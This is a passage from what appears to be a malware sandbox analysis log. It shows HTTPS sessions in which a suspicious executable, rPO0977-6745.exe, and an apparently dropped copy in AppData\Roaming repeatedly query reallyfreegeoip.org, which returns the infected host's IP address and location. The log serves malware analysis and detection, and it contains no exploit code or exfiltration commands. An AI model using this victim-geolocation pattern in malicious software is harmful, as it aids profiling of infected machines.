2024-07-24 13:08:20 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-24 13:08:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49705	188.114.97.3	443	2916	C:\Users\user\Desktop\rPO0977-6745.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 13:08:21 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-07-24 13:08:21 UTC	705	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:21 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 1252 Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TlH%2FYs9Ocfh7omlyFKd4kBD6yrJtHMslFx%2BjimhkqGGha5ARneibYypITHjxWEPq342K8ewddQXn5JYhNKkXRQfq7%2FKAxsRDPgy9LSJKQR0INhmBvGaKCQ4gbz3sOwrY8lrun4xk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8423717e908cc8-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 13:08:21 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-24 13:08:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49707	188.114.97.3	443	2916	C:\Users\user\Desktop\rPO0977-6745.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 13:08:22 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-07-24 13:08:23 UTC	705	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:23 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 1254 Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A6eFPl4YU1a%2B%2BX6XsN75%2Fi70fNsiD5LaxpZBjpyIHvzxby1bZEmZ1qhXZPySKTuuJKmguCzk9kP30oREgAqkcggXywApqWiUoku8Nqwxq8qp6Uaja0AjtVKyFIsa6yT7IGDxJnET"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a84237bfe43431b-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 13:08:23 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-24 13:08:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49712	188.114.97.3	443	2916	C:\Users\user\Desktop\rPO0977-6745.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 13:08:24 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-24 13:08:24 UTC	705	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:24 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 1255 Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l%2FJcNAGOLvyHohm5rZSKmUl3NrJprWvzSSTeqIcBpojbGz0zB%2Bl2WtkMSSOJ4aIcML8zBDOTom2lXdBiAmCtD1fz2FmcdMAgTaCuIULelhQa%2B4zxc26QjpkiG1H09ZlKfuW7OxQc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a842383ae24435c-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 13:08:24 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-24 13:08:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49713	188.114.97.3	443	8004	C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 13:08:24 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-24 13:08:24 UTC	703	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:24 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 1255 Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fQOqBGIluD%2B7e4EGOp2bumbMD7Yx5yozfao6zi1hLO8oHCLqyLbynkQ5Poz3sZ8VfG7CmJ01CG194PrITnTDeLeIi%2BKoimMJZLNfot68VV3XbytoJWRbxn6ix1LuUuvH7YQTYeAB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a842385e9ed8cd6-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 13:08:24 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-24 13:08:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49715	188.114.97.3	443	2916	C:\Users\user\Desktop\rPO0977-6745.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 13:08:25 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-07-24 13:08:25 UTC	705	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:25 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 1256 Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eqZdy%2Bmr3W0R1k9UoGCH1Fq3Sbon4NLwKxLk0jPg4pun8Ogny%2BiQoCmtM4QgaRgvhvlGNxZMNR00wQmcTkV5SEWIarvFtXKBODIO4GxyWTwiAJHlp7PfewAQGSi350l10k7g%2F8H7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a84238c9a4d17f5-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 13:08:25 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-24 13:08:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49716	188.114.97.3	443	8004	C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 13:08:25 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-07-24 13:08:25 UTC	705	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:25 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 1256 Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nzI%2Bl7J7AVVyXFrs%2Fybew9q3ZweLwMhsWiMfLIHGWDAOvDMdhtrizYPfHX8r0Buc2OOqaPf9KQEdz3VDMPF3vVc5bYjdGORwfHyzXTuEDzFAPvjF%2Bv3zdRxIv9Y7awCLNjUsPaKD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a84238cec428c83-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 13:08:25 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-24 13:08:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49719	188.114.97.3	443	2916	C:\Users\user\Desktop\rPO0977-6745.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 13:08:26 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-24 13:08:27 UTC	709	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:27 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 1258 Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u9z2ySrYvc1l7CRF9MCfMsYovuNIDzE6n3drMKY94ustcBS62bKsfhYYimeSJ0lrZBn97A8XZujXq%2Ba9iS%2Fs0jDIasy3s07O%2BmGu8b1t%2B0KgZPEsUzdoAiNN58BwrOtwU%2FdiGcqB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a842396e8714414-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 13:08:27 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-24 13:08:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49720	188.114.97.3	443	8004	C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 13:08:27 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-24 13:08:27 UTC	711	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:27 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 1258 Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ddpFdnKspsi93VtmwDzqQpDynmlh7xwpMXc%2F0Pb43Fx%2B6JDg0ZOJPxKI36jxb%2FH0qpFt%2Bu7fxCHHvZHiTrNeLKCURoKDUTAHcyVf5IOoOynxjQoh7SyRr4fkPy%2FS4eTIsHD%2BUlSN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8423972cd2727a-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 13:08:27 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-24 13:08:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49723	188.114.97.3	443	2916	C:\Users\user\Desktop\rPO0977-6745.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 13:08:28 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-07-24 13:08:28 UTC	713	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:28 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 1259 Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E8be3Du37cX%2FuMHCxzmbv6hGK3LEDy1jccK3orHMeskdKL8eTTZNBA7Is2eQ4PA%2FA4vZTsRo91q%2By8k1jFWj5P%2BhGaKerFYbKD21%2FbALY%2FcztGt9GEgeXzgs2bOA7%2FF7mnuethTM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a84239edbd543a3-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 13:08:28 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-24 13:08:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49724	188.114.97.3	443	8004	C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 13:08:28 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-07-24 13:08:28 UTC	705	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 13:08:28 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 1259 Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9zJ%2FnjQ2i3oe0TIBknQT1qfxrtE46xfTVYl3WwfLfTf%2BGDXy6lF4tt1NjIbQhrZw74K6ZxiIWlfDw14Vod2QVTM05I7w1M8AoYiat58a2G9Rp4upGfSAGcZ%2Bk2NVjUWo9MIFzgoq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a84239f0a4642d8-EWR alt-svc: h3=":443"; ma=86400
